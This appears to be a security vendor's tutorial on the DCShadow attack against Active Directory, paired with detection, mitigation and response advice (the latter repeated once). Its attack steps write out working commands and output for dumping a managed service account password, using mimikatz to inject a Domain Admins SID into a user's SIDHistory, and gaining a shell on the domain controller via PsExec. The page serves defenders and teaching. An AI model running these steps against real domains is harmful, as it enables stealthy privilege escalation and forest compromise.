DCShadow Attack using Mimikatz

Active Directory
Defense Evasion
Persistence

DCShadow is a technique in which an attacker abuses compromised replication permissions to mimic a domain controller and make malicious changes to Active Directory. It is often used to surreptitiously hide persistence mechanisms or to escalate privileges across domain trusts.

DCShadow is a particularly stealthy technique because the methods it uses do not create logs that detail the changes made. Thus, it can be difficult to discover and remove the changes made by an adversary.

Threat Summary
Target:
Active Directory
Tools:
ATT&CK® Tactic:
ATT&CK Technique:
Difficulty
Detection:
Medium
Mitigation:
Medium
Response:
Hard

Attack Tutorial: DCShadow Attack using Mimikatz

STEP 1

Compromise an account with administrative permissions

To perform the DCShadow attack, an adversary must first compromise the credentials of an Active Directory account with administrative permissions. Here’s how the password for a poorly secured group managed service account (GMSA) could be compromised:
PS> Install-Module DSInternals -Force
PS> $GMSAPwd = (Get-ADServiceAccount GMSA1 -Prop msDS-ManagedPassword).'msDS-ManagedPassword'
PS> ConvertFrom-ManagedPasswordBlob $GMSAPwd | Select-Object -ExpandProperty CurrentPassword
帙뽐怦渌㉼璿盯粩랜曞꘭�呓ꉷᏤ�뉇ꘉ욚�㡝측퉷ㅓ栤쪇�픸滈್䊟杂瀳谈ꋋ랕軡첤研麛쪡뚗ጵ謗篷협锭褶࡮뻭寞ꁕꈳ¹䲔ᯊ鵋宫鰄먚㹆⻔㚅买嬷滺눲㫚圐ન盢ḟ뼁ጘ䱏ケ蔤䮍⿆߾겋舤쇻ω킌쏑ퟠ쎫�갥挼矤缀醩ℸꆀ뭈Ȩ窢盒२葰霝빶덻妓㼪喟㗾ꖣ뙑ข
PS> 
STEP 2

Perform a DCShadow attack

Using the compromised account, the adversary can now replicate objects from Active Directory, make changes to them, and push those changes back to a real domain controller.

The attack includes two parts: 
  • Part 1.  The adversary elevates to SYSTEM and makes changes to the replicated object.
  • Part 2.  The attacker uses the compromised account to push the changes back to a real domain controller.

A common attack path, illustrated below for the user BobT, is to use mimikatz to inject a SIDHistory value for a privileged group in the same or another trusting domain. The SID used in this example represents the Domain Admins group in the parent (or forest root) domain.

Part 1:

PS> .\mimikatz.exe
mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started
 
mimikatz # !ProcessToken
Token from process 0 to process 0
 * from 0 will take SYSTEM token
 * to 0 will take all 'cmd' and 'mimikatz' process
Token from 4/System
 * to 2232/powershell.exe
 * to 1252/cmd.exe
 * to 4496/mimikatz.exe
 
mimikatz # lsadump::dcshadow /object:"CN=BobT,OU=Employees,DC=sub,DC=domain,DC=com" /attribute:SidHistory /value:S-1-5-21-441320023-234525631-506766575-512
** Domain Info **
 
Domain:         DC=sub,DC=domain,DC=com
Configuration:  CN=Configuration,DC=domain,DC=com
Schema:         CN=Schema,CN=Configuration,DC=domain,DC=com
dsServiceName:  ,CN=Servers,CN=Site2,CN=Sites,CN=Configuration,DC=domain,DC=com
domainControllerFunctionality: 7 ( WIN2016 )
highestCommittedUSN: 468849
 
** Server Info **
 
Server: dc1.sub.domain.com
  InstanceId  : {be2d1604-3232-42f6-9c5b-8a37fbcdd357}
  InvocationId: {b38c988f-c904-4c18-afb3-943f12c12399}
Fake Server (not already registered): wks2.sub.domain.com
 
** Attributes checking **
 
#0: SidHistory
 
** Objects **
 
#0: CN=BobT,OU=Employees,DC=sub,DC=domain,DC=com
  SidHistory (1.2.840.113556.1.4.609-90261 rev 0):
    S-1-5-21-441320023-234525631-506766575-512
    (01050000000000051500000057024e1abf93fa0defa4341e00020000)
 
 
** Starting server **
 
 > BindString[0]: ncacn_ip_tcp:wks2[59644]
 > RPC bind registered
 > RPC Server is waiting!
== Press Control+C to stop ==
  cMaxObjects : 1000
  cMaxBytes   : 0x00a00000
  ulExtendedOp: 0
  pNC->Guid: {5bf57149-701e-47c1-bb39-35577f4ea087}
  pNC->Sid : S-1-5-21-3501040295-3816137123-30697657
  pNC->Name: DC=sub,DC=domain,DC=com
SessionKey: 1ade4b2cd9238108e9cc7c275202b9705c4bca951cbdf0e09b6a061a0e678740
1 object(s) pushed
 > RPC bind unregistered
 > stopping RPC server
 > RPC server stopped

Part 2:

PS> .\mimikatz.exe
mimikatz # lsadump::dcshadow /push
** Domain Info **
 
Domain:         DC=sub,DC=domain,DC=com
Configuration:  CN=Configuration,DC=domain,DC=com
Schema:         CN=Schema,CN=Configuration,DC=domain,DC=com
dsServiceName:  ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=domain,DC=com
domainControllerFunctionality: 7 ( WIN2016 )
highestCommittedUSN: 1037880
 
** Server Info **
 
Server: dc1.sub.domain.com
  InstanceId  : {ebe88399-c570-4143-bb89-9dc6546b8e09}
  InvocationId: {bef4eddf-eb26-4324-ba9d-abbae40669c5}
Fake Server (not already registered): wks2.sub.domain.com
 
** Performing Registration **
 
** Performing Push **
 
Syncing DC=sub,DC=domain,DC=com
Sync Done
 
** Performing Unregistration **
STEP 3

Use the changes made to achieve further objectives

Finally, the adversary authenticates with the compromised account that is now a member of Domain Admins, thereby gaining administrative access to the forest root domain and the ability to compromise any domain in the forest.
PS> .\PsExec.exe \\dc1.domain.com powershell.exe
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS> hostname
dc1
PS>

Detect, Mitigate and Respond

Detect
Mitigate
Respond
Difficulty: Medium
The only concrete way to identify DCShadow is through network monitoring of DRSUAPI RPC requests for the operation DRSUAPI_REPLICA_ADD originating from systems that are not known domain controllers.

It is also possible to detect certain signs of DCShadow in Windows event logs; however, this approach does not readily show the changes made by the adversary. In order to mimic a domain controller, DCShadow must make several changes in Active Directory: 
  • Add a new NTDSDSA object.
  • Add a global catalog (GC/<host>) servicePrincipalName to a computer object that is not a known domain controller.
  • Remove both these items after the attack is completed. 
You can analyze events 5136 and 5141 in the Windows event log Audit Directory Service Changes subcategory to look for creation and deletion of server objects within sites.
Difficulty: Medium
Because DCShadow abuses features and privileges of Active Directory, it is not possible to eliminate this attack entirely. However, the following strategies can help reduce the risk that an adversary can successfully obtain the privileges necessary to execute the attack:
  • Use host-based firewalls to constrain lateral movement. For example, firewall policies should allow RDP or other remote management only from a small number of approved, controlled and monitored systems.
  • Do not allow users to possess administrative privileges across security boundaries. This greatly reduces how much an adversary can escalate their privileges.
  • Constrain the number of users with permissions to add computer objects to Active Directory.
  • Reduce and tightly govern built-in privileged groups and delegated administrative permissions.
  • Adopt good Active Directory hygiene. In particular, remove unused sites and computer objects.
Difficulty: Hard
DCShadow requires an adversary to have obtained substantial (e.g., Domain Admins) privileges in Active Directory. If this is detected, you should assume a total compromise of Active Directory and take the following steps:
  • Activate the incident response process and alert the incident response team.
  • Identify and quarantine implicated computers for forensic investigation and remediation activities.

Detect
Difficulty: Medium
The only concrete way to identify DCShadow is through network monitoring of DRSUAPI RPC requests for the operation DRSUAPI_REPLICA_ADD originating from systems that are not known domain controllers.

It is also possible to detect certain signs of DCShadow in Windows event logs; however, this approach does not readily show the changes made by the adversary. In order to mimic a domain controller, DCShadow must make several changes in Active Directory: 
  • Add a new NTDSDSA object.
  • Add a global catalog (GC/<host>) servicePrincipalName to a computer object that is not a known domain controller.
  • Remove both these items after the attack is completed. 
You can analyze events 5136 and 5141 in the Windows event log Audit Directory Service Changes subcategory to look for creation and deletion of server objects within sites.
Mitigate
Difficulty: Medium
Because DCShadow abuses features and privileges of Active Directory, it is not possible to eliminate this attack entirely. However, the following strategies can help reduce the risk that an adversary can successfully obtain the privileges necessary to execute the attack:
  • Use host-based firewalls to constrain lateral movement. For example, firewall policies should allow RDP or other remote management only from a small number of approved, controlled and monitored systems.
  • Do not allow users to possess administrative privileges across security boundaries. This greatly reduces how much an adversary can escalate their privileges.
  • Constrain the number of users with permissions to add computer objects to Active Directory.
  • Reduce and tightly govern built-in privileged groups and delegated administrative permissions.
  • Adopt good Active Directory hygiene. In particular, remove unused sites and computer objects.
Respond
Difficulty: Hard
DCShadow requires an adversary to have obtained substantial (e.g., Domain Admins) privileges in Active Directory. If this is detected, you should assume a total compromise of Active Directory and take the following steps:
  • Activate the incident response process and alert the incident response team.
  • Identify and quarantine implicated computers for forensic investigation and remediation activities.

MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.